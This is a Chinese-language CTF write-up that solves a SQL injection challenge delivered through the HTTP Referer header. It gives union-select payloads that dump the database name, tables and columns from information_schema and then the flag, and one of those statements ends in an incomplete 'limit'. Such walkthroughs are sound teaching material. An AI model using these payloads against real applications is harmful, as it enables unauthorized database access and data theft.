Refer注入:
这道题首先我自己一开始也有点乱,找不到referer在哪里
但根据大佬的博客:https://blog.csdn.net/qq_37450949/article/details/117003065
提示的话知道,referer的一些知识:
HTTP_REFERER简介
HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。
这句话的意思就是,只有当你向浏览器发送请求时,才会带上referer
如果一开始就抓包不发送请求是的得不到referer的,如下图:
所以我们要向浏览器发送一个post请求:
发送完后在进行抓包就可以找referer:
找到后对referer进行传参得到:
发现是可以传参的,于是就像正常的sql注入一样
先用语句判断是否有注入
然后开始报出库名
这里报出库名的语句是:
520 union select 1,database()
报表的语句是:
520 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' limit
报字段的语句是:
520 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='snzjcuobsw' limit 1
报字段内容,得到flag的语句是:
520 union select 1,group_concat(qjgzanghcc) from sqli.snzjcuobsw limit 1